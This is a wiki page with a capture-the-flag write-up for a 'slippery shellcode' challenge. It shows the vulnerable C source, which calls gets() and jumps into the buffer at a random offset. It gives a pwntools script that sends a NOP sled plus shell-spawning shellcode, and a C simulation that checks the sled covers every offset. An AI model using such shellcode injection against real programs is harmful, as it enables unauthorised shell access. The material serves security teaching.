Slippery shellcode
cheaterdxd edited this page Oct 13, 2019
This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0 on the shell server. Source.
No hint
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 512
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);   // no length check: the whole line we send is copied into buf
  puts(buf);
}

int main(int argc, char **argv){
  setvbuf(stdout, NULL, _IONBF, 0);
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  char buf[BUFSIZE];
  puts("Enter your shellcode:");
  vuln(buf);
  puts("Thanks! Executing from a random location now...");
  int offset = (rand() % 256) + 1;   // rand() is never seeded; offset is in 1..256
  ((void (*)())(buf+offset))();      // jumps into our input at that offset
  puts("Finishing Executing Shellcode. Exiting now...");
  return 0;
}
```
The program calls straight into our input, but not at the start of it: it jumps to buf+offset, and we have to make that work whatever offset is. Since offset = rand() % 256 + 1, it is always in the range 1..256. If we put 256 NOP instructions (0x90) in front of the shellcode, buf+offset always points either into the NOP sled or exactly at the first shellcode byte; the CPU slides down the NOPs and executes the shellcode. (rand() is never seeded with srand(), so the "random" offset is actually the same on every run, but the sled means we do not need to know it.) One caveat: gets() stops reading at a newline, so the payload must not contain a 0x0a byte.
```python
from pwn import *

s = process('./vuln')
# offset is 1..256, so 256 NOPs cover every case; 257 adds one byte of margin
shellcode = asm(shellcraft.i386.linux.sh())
payload = b'\x90' * 257 + shellcode   # bytes, not str: pwntools on Python 3 sends bytes
assert b'\n' not in payload           # gets() would stop reading at a newline
s.sendline(payload)
s.interactive()
```
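To check the sled reasoning without touching the shell server, here is an added C example (not part of the original write-up or the challenge) that builds a sled + shellcode payload, simulates the program's buf+offset call for every offset in 1..256, and confirms gets() would not truncate it. The shellcode bytes in SAMPLE_SC are a constructed stand-in for illustration, not real shellcode; the real payload comes from shellcraft as in the script above.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define NOP        0x90   /* x86 single-byte nop */
#define MAX_OFFSET 256    /* rand() % 256 + 1 takes the values 1..256 */
#define BUFSIZE    512    /* same buffer size as the challenge binary */

/* Constructed stand-in for the shellcode: a few bytes containing neither
 * 0x90 nor 0x0a. Illustration only, not executable shellcode. */
static const uint8_t SAMPLE_SC[] = { 0x31, 0xc0, 0x50, 0x68 };

/* Write sled_len NOPs followed by the shellcode into out.
 * Returns the payload length, or 0 if it does not fit in cap bytes. */
size_t build_payload(uint8_t *out, size_t cap, size_t sled_len,
                     const uint8_t *sc, size_t sc_len)
{
    if (sled_len + sc_len > cap)
        return 0;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    return sled_len + sc_len;
}

/* gets() stops reading at '\n', so any 0x0a byte truncates the payload. */
int gets_safe(const uint8_t *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == '\n')
            return 0;
    return 1;
}

/* Simulate ((void (*)())(buf+offset))(): execution starts at payload[offset],
 * steps over NOPs, and succeeds only if it arrives exactly at the first
 * shellcode byte. Landing in the middle of the shellcode counts as a miss. */
int lands_on_shellcode(const uint8_t *payload, size_t len,
                       size_t sled_len, size_t offset)
{
    size_t pc = offset;
    while (pc < len && payload[pc] == NOP)
        pc++;
    return pc == sled_len;
}

/* Try every offset the program can choose. Returns the first offset that
 * misses the shellcode, or 0 when all of 1..256 work. */
size_t first_bad_offset(const uint8_t *payload, size_t len, size_t sled_len)
{
    for (size_t off = 1; off <= MAX_OFFSET; off++)
        if (!lands_on_shellcode(payload, len, sled_len, off))
            return off;
    return 0;
}

/* Build the payload for a sled of sled_len bytes and check it.
 * Returns 0 when every offset works, the first bad offset otherwise, and
 * (size_t)-1 when the payload does not fit or gets() would truncate it. */
size_t check_sled(size_t sled_len)
{
    static uint8_t buf[BUFSIZE];
    size_t n = build_payload(buf, sizeof buf, sled_len, SAMPLE_SC, sizeof SAMPLE_SC);
    if (n == 0 || !gets_safe(buf, n))
        return (size_t)-1;
    return first_bad_offset(buf, n, sled_len);
}

int main(void)
{
    size_t sleds[] = { 100, 255, 256, 257 };
    for (size_t i = 0; i < sizeof sleds / sizeof sleds[0]; i++) {
        size_t bad = check_sled(sleds[i]);
        if (bad == 0)
            printf("sled %3zu: every offset 1..%d reaches the shellcode\n", sleds[i], MAX_OFFSET);
        else
            printf("sled %3zu: offset %zu misses the shellcode\n", sleds[i], bad);
    }
    return 0;
}
```

Build and run with `cc -o sled sled.c && ./sled`. A sled of 255 bytes fails at offset 256 (the jump lands on the second shellcode byte), which is why 256 is the minimum and the script's 257 is just a safety margin.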